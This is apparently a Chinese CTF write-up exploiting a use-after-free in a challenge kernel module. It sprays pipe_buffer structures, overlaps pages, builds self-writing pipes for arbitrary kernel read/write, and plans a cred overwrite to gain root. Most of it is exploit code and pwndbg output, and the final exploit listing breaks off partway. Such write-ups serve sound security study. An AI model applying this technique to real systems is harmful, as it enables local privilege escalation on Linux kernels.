3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/bin/sh

mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t debugfs none /sys/kernel/debug
mount -t devtmpfs devtmpfs /dev
mount -t tmpfs none /tmp
mdev -s
echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"

insmod /test.ko
chmod 666 /dev/water
chmod 740 /flag
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict
chmod 400 /proc/kallsyms

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /tmp

poweroff -d 0 -f

首先下载并编译对应版本的内核

1
sudo apt-get install linux-image-6.2.0-36-generic-dbgsym

漏洞分析

一次 UAF 并且只能控制第1字节:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
case 0x30u:
if ( !copy_from_user(&pointer, arg, 8LL) )
{
if ( delete_idx <= 0 && chunk )
{
kfree(chunk);
++delete_idx;
}
return 0LL;
}
return 0xFFFFFFFFFFFFFFEALL;
case 0x50u:
if ( !copy_from_user(&pointer, arg, 8LL) )
{
if ( edit_idx <= 0 && chunk && !copy_from_user(chunk, pointer.buf, 1LL) )
{
++edit_idx;
return 0LL;
}
return 0LL;
}
return 0xFFFFFFFFFFFFFFEALL;

入侵思路

具体的思路就是:

  • 申请堆 -> 释放 -> 堆喷内核结构体 -> 修改第1字节

需要利用的内核结构体就是 pipe_buffer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
/* size:0x28*0x10(kmalloc-0x400) */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};

struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
bool (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
bool (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
  • 当我们创建一个管道时,在内核中会生成16个连续的 pipe_buffer 结构体,申请的内存总大小刚好会让内核从 kmalloc-1k 中取出一个 object
  • pipe 系统调用提供了 fcntl(F_SETPIPE_SZ) 让我们可以重新分配 pipe_buffer 并指定其数量

内核结构体 pipe_buffer 的第一个条目为 page,覆盖末尾字节就可能导致 page 重叠:

下面是堆喷 pipe_buffer 的代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
memset(buf,0x31,0x200);
ioctl(fd,0x20,&buf);
ioctl(fd,0x30,&buf);

for(int i = 0; i < PIPE_NUM; i++){
if(pipe(pipe_list[i]) == -1){
errPrint("pipe");
}
}

for (int i = 0; i < PIPE_NUM; i++){
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, 0x1000 * 8) < 0){
/* 8 * pipe_buffer = 0x180 kmalloc-512 */
errPrint("fcntl");
}
}

for (int i = 0; i < PIPE_NUM; i++){
write(pipe_list[i][1], "AAAAAAAA", 8); // tag
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], &i, sizeof(int));
write(pipe_list[i][1], "AAAAAAAA", 8);
write(pipe_list[i][1], "BBBBBBBB", 8);
}

memset(buf,0,0x200);
ioctl(fd,0x50,&buf); /* 覆盖pipe_buffer->page末尾字节 */

int victim_idx = -1;
int orig_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){
char tag[0x10];
int nr;
memset(tag, 0, sizeof(tag));
read(pipe_list[i][0], tag, 8);
read(pipe_list[i][0], &nr, sizeof(int));
if (!strcmp(tag, "AAAAAAAA") && nr != i){
orig_idx = nr;
victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",victim_idx, orig_idx);
}
}
if (orig_idx == -1 || victim_idx == -1){
errPrint("can't find");
}

调试信息如下:

1
2
3
4
5
6
pwndbg> telescope 0xffff888006e46600
00:0000│ rdi 0xffff888006e46600 —▸ 0xffffea00001bef80 ◂— 0xfffffc0000000 /* page */
01:00080xffff888006e46608 ◂— 0xc00000000 /* offset, len */
02:00100xffff888006e46610 —▸ 0xffffffff82246ec0 ◂— 0x0 /* ops */
03:00180xffff888006e46618 ◂— 0x10
04:00200xffff888006e46620 ◂— 0x0
1
2
3
4
5
6
pwndbg> telescope 0xffff888006e46600
00:0000│ r10 rdi-1 0xffff888006e46600 —▸ 0xffffea00001bef00 ◂— 0xfffffc0000000
01:00080xffff888006e46608 ◂— 0xc00000000
02:00100xffff888006e46610 —▸ 0xffffffff82246ec0 ◂— 0x0
03:00180xffff888006e46618 ◂— 0x10
04:00200xffff888006e46620 ◂— 0x0
  • 可以发现 page 末尾被覆盖
1
2
3
4
pwndbg> search -t qword 0xffffea00001bef00
Searching for value: b'\x00\xef\x1b\x00\x00\xea\xff\xff'
<pt> 0xffff888006e46600 0xffffea00001bef00
<pt> 0xffff888006e46a00 0xffffea00001bef00
  • 导致有两个 pipe_buffer 指向同一个 page

接下来就可以利用 UAF pipe_buffer 来泄露数据:

  • 释放 UAF pipe_buffer(4k的缓冲页也会被释放,释放之后数据不会清除仍然可读写)
  • 使用 fcntl(F_SETPIPE_SZ) 重新分配 pipe_buffer,部分的 pipe_buffer 就会被申请到之前我们释放的4k缓冲页上
  • 利用 UAF 对4k缓冲页进行读取就可以泄露地址

下面是测试样例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
struct pipe_buffer info_pipe_buf;
size_t snd_pipe_sz = 0x1000 * (SND_PIPE_BUF_SZ / sizeof(struct pipe_buffer));

memset(buf,'p',sizeof(buf));
write(pipe_list[victim_idx][1], buf, SND_PIPE_BUF_SZ * 2 - 24 - 3 * sizeof(int));
close(pipe_list[orig_idx][0]); /* 释放其中一个pipe_buffer */
close(pipe_list[orig_idx][1]);

sleep(2);

puts("write down");

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx){
continue;
}
if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, snd_pipe_sz) < 0){
/* 2 * pipe_buffer = 0x60 kmalloc-96 */
errPrint("Fcntl Pipe");
}
}

memset(buf,0,sizeof(buf));
read(pipe_list[victim_idx][0], buf, SND_PIPE_BUF_SZ - 8 - sizeof(int));
print_hex(buf,SND_PIPE_BUF_SZ - 8);
read(pipe_list[victim_idx][0], &info_pipe_buf, sizeof(info_pipe_buf));
print_hex((char*)&info_pipe_buf,sizeof(info_pipe_buf));

sleep(2);

printf("\033[34m\033[1m[?] info_pipe_buf->page: \033[0m%p\n"
"\033[34m\033[1m[?] info_pipe_buf->ops: \033[0m%p\n",
info_pipe_buf.page, info_pipe_buf.ops);

这里的调试需要一些技巧,在第一个 sleep(2) 之前使用 search -s AAAABBBBBBBBpppppppp 查找:

1
2
3
pwndbg> search -s AAAABBBBBBBBpppppppp
Searching for value: 'AAAABBBBBBBBpppppppp'
<pt> 0xffff88800749c018 'AAAABBBBBBBBpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp'
  • AAAAAAAABBBBBBBB 是之前写入的数据,其详细信息如下:
1
2
3
4
5
pwndbg> telescope 0xffff88800749c018-0x18
00:00000xffff88800749c000 ◂— 0x4141414141414141 ('AAAAAAAA')
01:00080xffff88800749c008 ◂— 0x300000003
02:00100xffff88800749c010 ◂— 0x4141414100000003
03:00180xffff88800749c018 ◂— 'AAAABBBBBBBBpppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppp'
  • 这里的 0xffff88800749c000 就是被释放的4k缓冲页

在第二个 sleep(2) 之前再次打印 0xffff88800749c000

1
2
3
4
5
6
7
8
9
10
11
12
13
pwndbg> telescope 0xffff88800749c018-0x18
00:00000xffff88800749c000 —▸ 0xffffea00001d5f40 ◂— 0xfffffc0000000
01:00080xffff88800749c008 ◂— 0x180000000c /* '\x0c' */
02:00100xffff88800749c010 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
03:00180xffff88800749c018 ◂— 0x10
04:00200xffff88800749c020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff88800749c040 ◂— 0x0
... ↓ 3 skipped
0c:00600xffff88800749c060 —▸ 0xffffea00001d5cc0 ◂— 0xfffffc0000000
0d:00680xffff88800749c068 ◂— 0x180000000c /* '\x0c' */
0e:00700xffff88800749c070 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
0f:00780xffff88800749c078 ◂— 0x10
  • 第一次 read(pipe_list[victim_idx][0] 将会从 0xffff88800749c00c 开始,读取 84 字节到 0xffff88800749c060
  • 第二次 read(pipe_list[victim_idx][0] 就会泄露位于 0xffff88800749c060pipe_buffer

泄露数据以后,我们就可以通过 write(pipe_list[victim_idx][1]) 来覆写 pipe_buffer,利用这一点可以构造自写管道:

在第一次 UAF 时我们获取到了 page 结构体的地址,而 page 结构体的大小固定为 0x40,试想若是我们可以不断地修改一个 pipe 的 page 指针,则我们便能完成对整个内存空间的任意读写

再次重新分配 pipe_buffer 结构体到第二级 page-level UAF 页面上,由于这张物理页面对应的 page 结构体的地址对我们而言是已知的,我们可以直接让这张页面上的 pipe_buffer 的 page 指针指向自身,从而直接完成对自身的修改

修改可控的 pipe_buffer2->page,即可完成二级 UAF:

用同样的方法将 pipe_buffer3 申请到4k缓冲页上,接着覆盖 pipe_buffer3->pagepipe_buffer2->page

测试代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
info_pipe_buf.page = (struct page *)((size_t)info_pipe_buf.page + 0x40);
write(pipe_list[victim_idx][1], &info_pipe_buf, sizeof(info_pipe_buf));
puts("change pipe_buffer down");

sleep(2);

int snd_orig_idx = -1;
int snd_victim_idx = -1;
for (int i = 0; i < PIPE_NUM; i++){ /* 第二次堆喷 */
int nr;
if (i == orig_idx || i == victim_idx){
continue;
}
read(pipe_list[i][0], &nr, sizeof(int));
if (i < PIPE_NUM && i != nr){
snd_orig_idx = nr;
snd_victim_idx = i;
printf("\033[32m\033[1m[+] Found index-%d and index-%d point the same page \033[0m\n",snd_victim_idx, snd_orig_idx);
}
}

if (snd_orig_idx == -1 || snd_victim_idx == -1){
errPrint("can't find");
}

size_t trd_pipe_sz = 0x1000 * (TRD_PIPE_BUF_SZ / sizeof(struct pipe_buffer));
struct pipe_buffer evil_pipe_buf;
struct page *page_ptr;

memset(buf,'k',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - 24 - 3 * sizeof(int));
close(pipe_list[snd_orig_idx][0]);
close(pipe_list[snd_orig_idx][1]);

puts("write down");
sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

if (fcntl(pipe_list[i][1], F_SETPIPE_SZ, trd_pipe_sz) < 0){
/* 4 * pipe_buffer = 0xc0 kmalloc-192 */
errPrint("Fcntl Pipe");
}
}

puts("fcntl down");
sleep(2);

evil_pipe_buf.page = info_pipe_buf.page;
evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;
evil_pipe_buf.ops = info_pipe_buf.ops;
evil_pipe_buf.flags = info_pipe_buf.flags;
evil_pipe_buf.private = info_pipe_buf.private;

write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));
puts("change pipe_buffer down");

调试信息如下:

1
2
3
00:00000xffff888002fd1aa0 —▸ 0xffffea00001d54c0 ◂— 0xfffffc0000000
01:00080xffff888002fd1aa8 ◂— 0x180000000c /* '\x0c' */
02:00100xffff888002fd1ab0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1
2
3
00:00000xffff888002fd1aa0 —▸ 0xffffea00001d5500 ◂— 0xfffffc0000000
01:00080xffff888002fd1aa8 ◂— 0x180000000c /* '\x0c' */
02:00100xffff888002fd1ab0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
  • 修改 pipe_buffer 获取第二次 UAF
1
2
3
pwndbg> search -s AAAABBBBBBBBkkkkkkkk
Searching for value: 'AAAABBBBBBBBkkkkkkkk'
<pt> 0xffff888007554018 'AAAABBBBBBBBkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk'
  • 和之前的调试方法一样,先查找 write(pipe_list[snd_victim_idx][1]) 写入的位置
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pwndbg> telescope 0xffff888007554018-0x18
00:00000xffff888007554000 —▸ 0xffffea00001d2440 ◂— 0xfffffc0000000
01:00080xffff888007554008 ◂— 0x1400000010
02:00100xffff888007554010 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
03:00180xffff888007554018 ◂— 0x10
04:00200xffff888007554020 ◂— 0x0
... ↓ 3 skipped
08:00400xffff888007554040 ◂— 0x0
... ↓ 7 skipped
10:00800xffff888007554080 ◂— 0x0
... ↓ 7 skipped
18:00c0│ 0xffff8880075540c0 —▸ 0xffffea00001d3cc0 ◂— 0xfffffc0000000
19:00c8│ 0xffff8880075540c8 ◂— 0x1400000010
1a:00d0│ 0xffff8880075540d0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1b:00d8│ 0xffff8880075540d8 ◂— 0x10
1c:00e00xffff8880075540e0 ◂— 0x0
... ↓ 3 skipped
20:01000xffff888007554100 ◂— 0x0
  • 起始地址为 0xffff888007554024,由 write(pipe_list[snd_victim_idx][1]) 写入 156 字节,因此下次覆盖的地址为 0xffff8880075540c0
1
2
3
4
5
6
7
8
9
pwndbg> telescope 0xffff888007554018-0x18
......
18:00c0│ 0xffff8880075540c0 —▸ 0xffffea00001d5500 ◂— 0xfffffc0000200
19:00c8│ 0xffff8880075540c8 ◂— 0xc0000000c0
1a:00d0│ 0xffff8880075540d0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1b:00d8│ 0xffff8880075540d8 ◂— 0x10
1c:00e00xffff8880075540e0 ◂— 0x0
... ↓ 3 skipped
20:01000xffff888007554100 ◂— 0x0
  • 覆盖位于 0xffff8880075540c0pipe_buffer
  • 位于 0xffffea00001d5500page 结构体会映射到 0xffff888007554000
  • 执行 write(pipe_list[target][1]) 时可以修改 pipe_buffer 本身,这相当于一个 self-writing pipe

通过如下代码可以构造另外两个 self-writing pipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_2nd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m%d\n",
self_2nd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'n',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_3rd_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_3rd_pipe_idx);
break;
}
}

evil_pipe_buf.offset = TRD_PIPE_BUF_SZ;
evil_pipe_buf.len = TRD_PIPE_BUF_SZ;

memset(buf,'m',sizeof(buf));
write(pipe_list[snd_victim_idx][1], buf, TRD_PIPE_BUF_SZ - sizeof(evil_pipe_buf));
sleep(2);
write(pipe_list[snd_victim_idx][1], &evil_pipe_buf, sizeof(evil_pipe_buf));

puts("change pipe_buffer down");
sleep(2);

for (int i = 0; i < PIPE_NUM; i++){
if (i == orig_idx || i == victim_idx || i == snd_orig_idx || i == snd_victim_idx || i == self_2nd_pipe_idx || i == self_3rd_pipe_idx){
continue;
}

read(pipe_list[i][0], &page_ptr, sizeof(page_ptr));
printf("%p\n",page_ptr);
if (page_ptr == evil_pipe_buf.page){
self_4th_pipe_idx = i;
printf("\033[32m\033[1m[+] Found self-writing pipe:\033[0m"
"%d\n",
self_4th_pipe_idx);
break;
}
}

调试信息如下:

1
2
3
4
5
pwndbg> search -t qword (0xffffea00001d5040+0x40)
Searching for value: b'\x80P\x1d\x00\x00\xea\xff\xff'
<pt> 0x7fffa821f280 0xffffea00001d5080
......
<pt> 0xffff8880075420c0 0xffffea00001d5080
  • 搜索 info_pipe_buf->page + 0x40(经过调试,最后一个就是目标)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
pwndbg> telescope 0xffff8880075420c0
00:00000xffff8880075420c0 —▸ 0xffffea00001d5080 ◂— 0xfffffc0000200 /* self-writing pipe1 */
01:00080xffff8880075420c8 ◂— 0xb8000000c8
02:00100xffff8880075420d0 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂—0
03:00180xffff8880075420d8 ◂— 0x10
04:00200xffff8880075420e0 ◂— 0x0
05:00280xffff8880075420e8 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
08:00400xffff888007542100 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
10:00800xffff888007542140 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 7 skipped
18:00c0│ 0xffff888007542180 —▸ 0xffffea00001d4bc0 ◂— 0xfffffc0000000
19:00c8│ 0xffff888007542188 ◂— 0x1400000010
1a:00d0│ 0xffff888007542190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂—0
1b:00d8│ 0xffff888007542198 ◂— 0x10
1c:00e00xffff8880075421a0 ◂— 0x0
1
2
3
4
5
18:00c0│  0xffff888007542180 —▸ 0xffffea00001d5080 ◂— 0xfffffc0000200 /* self-writing pipe2 */
19:00c8│ 0xffff888007542188 ◂— 0xc0000000c0
1a:00d0│ 0xffff888007542190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1b:00d8│ 0xffff888007542198 ◂— 0x10
1c:00e00xffff8880075421a0 ◂— 0x0
  • 覆盖位于 0xffff888007542180pipe_buffer
1
2
3
4
5
6
7
8
9
1d:00e80xffff8880075421a8 ◂— 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
... ↓ 2 skipped
20:01000xffff8880075421c0 ◂— 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
... ↓ 7 skipped
28:01400xffff888007542200 ◂— 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
... ↓ 7 skipped
30:01800xffff888007542240 —▸ 0xffffea00001d4b00 ◂— 0xfffffc0000000
31:01880xffff888007542248 ◂— 0xc00000018
32:01900xffff888007542250 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
1
2
3
4
5
30:01800xffff888007542240 —▸ 0xffffea00001d5080 ◂— 0xfffffc0000200 /* self-writing pipe3 */
31:01880xffff888007542248 ◂— 0xc0000000c0
32:01900xffff888007542250 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
33:01980xffff888007542258 ◂— 0x10
34:01a0│ 0xffff888007542260 ◂— 0x0
  • 覆盖位于 0xffff888007542240pipe_buffer

现在成功将3个 pipe_buffer 修改为 self-writing pipe(执行 write(pipe_list[target][1]) 可以修改 pipe_buffer 本身)

  • self-writing pipe1:偏移为 0xc0
  • self-writing pipe2:偏移为 0x180
  • self-writing pipe3:偏移为 0x240

之后就可以进行 RAA 和 WAA 了,这里我们使用三个管道:

  • self-writing pipe1:用以进行内存空间中的任意读写,我们通过修改其 page 指针完成
  • self-writing pipe2:用以修改 self-writing pipe3,使其写入的起始位置指向 self-writing pipe1
  • self-writing pipe3:用以修改 self-writing pipe1self-writing pipe2,使得 self-writing pipe1 的 pipe 指针指向指定位置,self-writing pipe2 的写入起始位置指向 self-writing pipe3

这里可以篡改 pipe_buffer->offsetpipe_buffer->len 来移动 pipe 的读写起始位置,从而实现无限循环的读写,但是这两个变量会在完成读写操作后重新被赋值

在执行读写原语之前需要先执行如下的操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
memcpy(&evil_2nd_buf, &info_pipe_buf, sizeof(evil_2nd_buf));
memcpy(&evil_3rd_buf, &info_pipe_buf, sizeof(evil_3rd_buf));
memcpy(&evil_4th_buf, &info_pipe_buf, sizeof(evil_4th_buf));

evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0xff0;

evil_3rd_buf.offset = TRD_PIPE_BUF_SZ * 3;
evil_3rd_buf.len = 0;
sleep(2);
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));
puts("change pipe_buffer down");
sleep(2);

evil_4th_buf.offset = TRD_PIPE_BUF_SZ;
evil_4th_buf.len = 0;

调试信息如下:

1
2
3
4
5
6
7
10:00800xffff88800754a168 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
13:00980xffff88800754a180 —▸ 0xffffea00001d5280 ◂— 0xfffffc0000200
14:00a0│ 0xffff88800754a188 ◂— 0xb8000000c8
15:00a8│ 0xffff88800754a190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
16:00b0│ 0xffff88800754a198 ◂— 0x10
17:00b8│ 0xffff88800754a1a0 ◂— 0x0
1
2
3
4
5
6
7
10:00800xffff88800754a168 ◂— 0x6e6e6e6e6e6e6e6e ('nnnnnnnn')
... ↓ 2 skipped
13:00980xffff88800754a180 —▸ 0xffffea00001d5280 ◂— 0xfffffc0000200
14:00a0│ 0xffff88800754a188 ◂— 0x240
15:00a8│ 0xffff88800754a190 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
16:00b0│ 0xffff88800754a198 ◂— 0x10
17:00b8│ 0xffff88800754a1a0 ◂— 0x0
  • 偏移 0x240 处是 self-writing pipe3
1
2
3
4
2b:01580xffff88800754a240 —▸ 0xffffea00001d5280 ◂— 0xfffffc0000200
2c:01600xffff88800754a248 ◂— 0xe0000000c8
2d:01680xffff88800754a250 —▸ 0xffffffff82246ec0 (__entry_text_end+283401) ◂— 0x0
2e:01700xffff88800754a258 ◂— 0x10
  • 现在往 self-writing pipe2 中写入数据就会修改 self-writing pipe3

任意读写的原语如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
void arbitrary_read_by_pipe(struct page *page_to_read, void *dst)
{
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0x1ff8;
evil_2nd_buf.page = page_to_read;

/* 修改pipe3->offset=0,之后往pipe3中写入数据时会覆盖pipe1 */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* 修改pipe1->page=page_to_read */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
/* 填充空间,为了使下一次write可以修改pipe2 */
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));
/* 修改pipe2->offset=0x240,之后往pipe2中写入数据时会覆盖pipe3 */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

read(pipe_list[self_2nd_pipe_idx][0], dst, 0xfff); /* RAA */
}

void arbitrary_write_by_pipe(struct page *page_to_write, void *src, size_t len)
{
evil_2nd_buf.page = page_to_write;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* 修改pipe3->offset=0,之后往pipe3中写入数据时会覆盖pipe1 */
write(pipe_list[self_3rd_pipe_idx][1], &evil_4th_buf, sizeof(evil_4th_buf));

/* 修改pipe1->page=page_to_write */
write(pipe_list[self_4th_pipe_idx][1], &evil_2nd_buf, sizeof(evil_2nd_buf));
/* 填充空间,为了使下一次write可以修改pipe2 */
write(pipe_list[self_4th_pipe_idx][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));
/* 修改pipe2->offset=0x240,之后往pipe2中写入数据时会覆盖pipe3 */
write(pipe_list[self_4th_pipe_idx][1], &evil_3rd_buf, sizeof(evil_3rd_buf));

write(pipe_list[self_2nd_pipe_idx][1], src, len); /* WAA */
}

利用 RAA 来扫描内存空间,查找可用的地址来计算内核偏移

接着可以利用 prctl(PR_SET_NAME) 重命名当前进程,然后利用 RAA 来查找 task_struct 的位置

最后利用 WAA 将 task_struct->cred 修改为 init_cred 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sched.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <stdint.h>
#include <ctype.h>

size_t kernel_base = 0xffffffff81000000, kernel_offset = 0;
size_t page_offset_base = 0xffff888000000000, vmemmap_base = 0xffffea0000000000;
size_t init_task, init_nsproxy, init_cred;

void bind_core(int core){
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

int print_hex(void *p, int size)
{
int i;
unsigned char *buf = (unsigned char *)p;

if(size % sizeof(void *))
{
return 1;
}
printf("--------------------------------------------------------------------------------\n");
for (i = 0; i < size; i += sizeof(void *)){
printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
i, buf[i+0], buf[i+1], buf[i+2], buf[i+3], buf[i+4], buf[i+5], buf[i+6], buf[i+7], *(unsigned long*)&buf[i]);
}
return 0;
}

void errPrint(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(2);
exit(EXIT_FAILURE);
}

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

void get_root(void)
{
if(getuid()) {
